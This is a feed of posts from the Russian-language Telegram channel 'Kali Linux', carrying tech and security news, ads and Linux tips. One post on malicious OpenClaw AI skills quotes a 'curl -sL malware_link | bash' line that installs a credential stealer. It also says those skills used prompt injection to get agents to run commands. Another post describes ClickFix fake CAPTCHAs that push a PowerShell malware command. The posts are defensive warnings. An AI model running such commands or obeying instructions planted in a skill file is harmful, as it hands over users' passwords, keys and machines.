Kali Linux
54.7K subscribers
1.07K photos
84 videos
13 files
1.11K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🔍 Вы уверены, что знаете, какое ПО реально установлено у ваших сотрудников?

Чаще всего бизнес теряет деньги не на взломах, а на:

🚫 неучтенном софте
🚫 дублирующихся лицензиях
🚫 срочных закупках и штрафах после проверок

Это и есть теневые ИТ — незаметная пробоина в бюджете и безопасности.

С 16 по 20 февраля «Инферит ИТМен» проводит бесплатный онлайн-марафон. Говорим только о практике:

как найти неучтенное ПО
как остановить перерасход из-за хаоса в активах
с чего начинается реальный контроль инфраструктуры

Марафон пройдет в закрытом Telegram-канале.
Материалы остаются у участников.

👉 Участвовать бесплатно
😁6👍52🔥2
🔐 HackerAI - простой способ проверить кибербезопасность без команды хакеров

В X активно обсуждают HackerAI — сервис, который использует ИИ для автоматического поиска уязвимостей в сайтах, приложениях и коде. Идея в том, чтобы сделать базовый аудит безопасности доступным не только специалистам по пентесту.

Как это работает
Загружаешь проект, код или указываешь сайт — система проводит анализ и показывает потенциальные слабые места и риски.

Что умеет
— Ищет проблемы в логике работы и настройках
— Подсвечивает возможные уязвимости
— Объясняет, где именно проблема и почему это риск
— Работает как ИИ-ассистент, а не как сложный профессиональный софт
— Доступен онлайн и в десктоп-версии

Кому полезно
— Стартапам без выделенной security-команды
— Разработчикам и веб-студиям
— Администраторам сайтов и сервисов
— Фрилансерам
— Всем, кто запускает веб-проекты и хочет снизить риски

Главная ценность
- быстро увидеть очевидные проблемы безопасности до того, как ими воспользуется кто-то другой.

https://hackerai.co/download
33👍20🔥7🥰3🤬2😢2👎1
This media is not supported in your browser
VIEW IN TELEGRAM
⚡️ Найди любого человека в файлах Эпштейна с помощью Python!

Этот репозиторий позволяет проверить, упоминаются ли ваши контакты в открытых судебных документах по делу Эпштейна.

Инструмент анализирует список имён (например, из LinkedIn) и ищет точные совпадения в опубликованных судебных материалах. В результате вы получаете удобный HTML-отчёт со всеми найденными упоминаниями.


Что умеет:

- Поиск по базе судебных документов
- Сортировка упоминаний по количеству
- Генерация наглядного HTML-отчёта
- Работа с файлами контактов (CSV)

Проверь своего друга, не был ли он замечен на печально известном острове.

Клонируем репозиторий
git clone https://github.com/cfinke/EpsteIn.git
cd EpsteIn

Установка зависимостей
pip install -r requirements.txt

Подготовьте CSV-файл с именами (по одному имени в строке)
example.csv:
Oleg Petrov
Nikolay Sobolev

Запуск анализа
python epstein.py example.csv

После выполнения будет создан HTML-отчет с найденными совпадениями


https://github.com/cfinke/EpsteIn
😁74👍2212🤩5👏2
🔥На Stepik вышел курс: Linux: полный апгрейд твоих скиллов

Хочешь реально понимать, что происходит под капотом твоей системы, а не просто кликать по GUI?

Без глубокого знания базы ты не инженер - ты просто пользователь.

🔹 В курсе ты:

- Освоишь bash, grep, sed, awk - инструменты, которыми живут админы.
- Разберёшь права, процессы, сеть, файловую систему и научишься чинить всё, что падает.
- Настроишь SSH, firewall, systemd, crontab, демоны и автозапуск.
- Научишься анализировать логи, следить за нагрузкой, и не паниковать при 100% CPU.

💡 Формат: пошаговое объяснение базы и разбор важных практик по работе с Linux.

🎯 После курса ты: будешь чувствовать Linux как родную среду и забудешь, что такое “permission denied”.

🚀 24 часа действует скидка 30%

👉 Учиться со скидкой
15👍11👎6🔥5🤔3
🔥 Смартфон превращается в мини-ПК - Arch Linux теперь запускается на Android буквально в один тап.

Без старых схем с VNC и тормозами. Всё переписано на Rust и работает через нативный Wayland, поэтому система ощущается живой, а не как удалённый рабочий стол.

Что это даёт на практике:
- можно кодить прямо с телефона
- поднимать локальные серверы
- тестировать и дебажить проекты в полноценном Linux-окружении

Как устроено внутри:
- используется Arch Linux ARM64
- система запускается через Proot, без рутования
- уже работают XFCE и даже KDE Plasma через XWayland

За счёт нативного кода на Rust и отсутствия лишних прослоек оверхед минимальный по сравнению со старыми X11/VNC-решениями.

Фактически - у тебя в кармане полноценная Linux-машина, а не эмуляция терминала.

Arch теперь реально везде.

https://localdesktop.github.io/
🔥4221👍14👎4
✔️ OpenAI обвинила DeepSeek в краже знаний через дистилляцию.

В меморандуме для Комитета Палаты представителей по Китаю OpenAI пожаловалась, что DeepSeek обучала свои модели на выходных данных чужих моделей для воспроизведения возможностей американских ИИ-систем.

По данным компании, сотрудники DeepSeek применяли сторонние роутеры и программный доступ к API, чтобы обойти защитные механизмы. OpenAI также указала на теневых реселлеров своих сервисов. Заблокировать их активность пока безрезультатны: методы обфускации становятся все изощреннее.

Помимо бизнес-угрозы, китайские модели бесплатны, тогда как американские ИИ-гиганты инвестировали миллиарды в инфраструктуру.

https://www.bloomberg.com/news/articles/2026-02-12/openai-accuses-deepseek-of-distilling-us-models-to-gain-an-edge
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4226😁22🔥12👎3
2000
Линус Торвальдс:
«Разговоры ничего не стоят.
Покажите мне код.»

2026
ИИ:
«Код ничего не стоит.
Покажите мне промпт»
😁125👍13🔥10😢98🤔6
⚡️ Хакеры начали атаковать пользователей Windows через фейковые CAPTCHA.

Схема простая.
На сайте появляется «проверка Cloudflare», но вместо обычных картинок пользователя просят:
- нажать Win + R
- вставить текст
- нажать Enter

В буфер обмена уже подставлена PowerShell-команда.
После запуска она скачивает и устанавливает вредонос (StealC).

Что происходит дальше:
- кража паролей из браузеров
- доступ к Outlook и почте
- выгрузка криптокошельков
- данные Steam и других сервисов
- системная информация и скриншоты

Почему это опасно
Файл не скачивается вручную.
Пользователь сам запускает вредонос — защита часто не срабатывает.

Метод называется ClickFix — и он активно распространяется, потому что выглядит как обычная проверка безопасности.

Главный вывод
Если сайт просит выполнить что-то через Win + R, PowerShell или Terminal — это почти наверняка атака.

Сегодня главный вектор взлома - не уязвимости системы, а доверие пользователя.

https://www.windowscentral.com/microsoft/windows/windows-pc-targeted-by-hackers-in-a-fake-captcha-scam

@linuxkalii
😁45👍23🔥1811🤬3🤔1
🔥103😁9610👏3🥰1
⚡️ AI-плагины стали новым вектором атак

В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.

Что произошло

- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие

Как работала атака

В файле SKILL.md скрывалась инструкция:

curl -sL malware_link | bash


После выполнения устанавливался Atomic Stealer (macOS), который собирал:

- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain

На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.

Дополнительно

- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз

Почему это важно

ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.

Теперь риск выше, чем в классических supply chain атаках.

Раньше:
— вредоносный пакет выполнялся автоматически

Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам

AI-агенты становятся новой целью supply chain-атак.

Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.

Вывод

Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам

В эпоху агентного AI безопасность важнее удобства.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3014👍9
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 Как случайно сделать DDoS своим же кодом

Как случайно устроить DDoS самому себе - самый частый сценарий это когда ты запускаешь 1000 запросов параллельно и думаешь, что ускоряешься, а на деле убиваешь свой же сервис или сайт.

Что ломает всё быстрее всего:

Нет лимитов на конкурентность - корутины или потоки плодятся бесконечно

Нет пула соединений - каждый запрос создаёт новый коннект и душит сеть

Нет таймаутов - зависшие запросы копятся и съедают ресурсы

Нет ретраев с backoff - ты усиливаешь нагрузку, когда системе и так плохо

Нет rate limit - ты сам становишься источником перегруза

Правильная база - всегда ограничивай параллелизм семафором, используй один клиент с пулом, ставь таймауты и делай аккуратные ретраи.


import asyncio
import httpx

URLS = ["https://example.com"] * 500

async def fetch(client, sem, url):
async with sem: # лимит конкурентности
r = await client.get(url, timeout=10.0)
return r.status_code

async def main():
sem = asyncio.Semaphore(20) # не больше 20 запросов одновременно
limits = httpx.Limits(max_connections=50, max_keepalive_connections=20)
async with httpx.AsyncClient(limits=limits) as client: # пул соединений
tasks = [fetch(client, sem, u) for u in URLS]
results = await asyncio.gather(*tasks, return_exceptions=True)
print("done:", len(results))

asyncio.run(main())


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3314🔥2
⚡️ Пентагон может разорвать сотрудничество с Anthropic.

Причина - компания отказалась разрешить использование своих моделей для «любых законных целей».

Anthropic настаивает на жестких ограничениях:

- запрет на массовую внутреннюю слежку
- запрет на полностью автономное оружие без участия человека

Конфликт обострился после спорного случая использования Claude в военной операции.
Это показало более глубокую проблему.

С одной стороны - Пентагон хочет максимально свободное применение ИИ.
С другой - Anthropic придерживается строгой политики безопасности и этики.

И здесь возникает парадокс:

Высокие этические стандарты начинают мешать бизнесу.

Главный вопрос на будущее:

Сможет ли компания сохранить принципы и при этом конкурировать на рынке, где государственные контракты - это миллиарды?

https://www.axios.com/2026/02/15/claude-pentagon-anthropic-contract-maduro
👍26🤔1914👎1🔥1😁1
This media is not supported in your browser
VIEW IN TELEGRAM
✔️ Простое устранение ошибок в Linux

В Linux проще всего начинать устранение ошибок с проверки логов и статуса сервисов: сначала понять, *что именно сломалось*, а уже потом менять настройки.

Смотрите логи, проверяйте, запущена ли служба, и воспроизводите ошибку — так вы почти всегда быстро найдёте причину.



посмотреть последние сообщения ядра
dmesg | tail -30

# общ systemd-логи
journalctl -xe

# логи конкретного сервиса
journalctl -u nginx --since "10 min ago"

# проверить, запущен ли сервис
systemctl status nginx

# перезапустить сервис (если конфиг исправен)
sudo systemctl restart nginx

# поиск ошибки по ключевому слову
grep -i "error" /var/log/syslog | tail -20

# следить за логом в реальном времени
tail -f /var/log/app.log

# проверить, какой порт занят
sudo lsof -i -P -n | grep LISTEN

# проверить права на файл
ls -l /path/to/file
Please open Telegram to view this post
VIEW IN TELEGRAM
👍357🔥3
😐 Сгенерированные лица стали настолько реалистичными, что мы перестали их распознавать.

Исследователи из Австралии провели эксперимент с 125 участниками и выяснили:
обычные люди отличают лица, созданные нейросетью, от настоящих почти на уровне случайного угадывания.

Даже люди с очень хорошей зрительной памятью показали лишь небольшое преимущество.

Проблема в том, что ошибки AI изменились.

Раньше фейковые изображения выдавали себя:
- лишними пальцами
- странной кожей
- артефактами

Теперь всё наоборот.

Современные генеративные модели создают лица, которые выглядят:
- идеально симметричными
- статистически «средними»
- с безупречной кожей
- с идеальными пропорциями

Именно слишком идеальный вид становится единственным признаком синтетики.

Авторы исследования предупреждают:

Такой уровень реализма может создать серьёзные риски для:
- биометрических систем
- верификации личности
- систем безопасности
- онлайн-идентификации

Главный вывод:

Раньше мы искали дефекты, чтобы найти фейк.
Теперь фейк - это то, что выглядит слишком идеально.

Проверить себя можно в онлайн-демо исследования (UNSW).

https://www.unsw.edu.au/newsroom/news/2026/02/humans-overconfident-telling-AI-faces-real-faces-people-fake
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍15🔥6😱6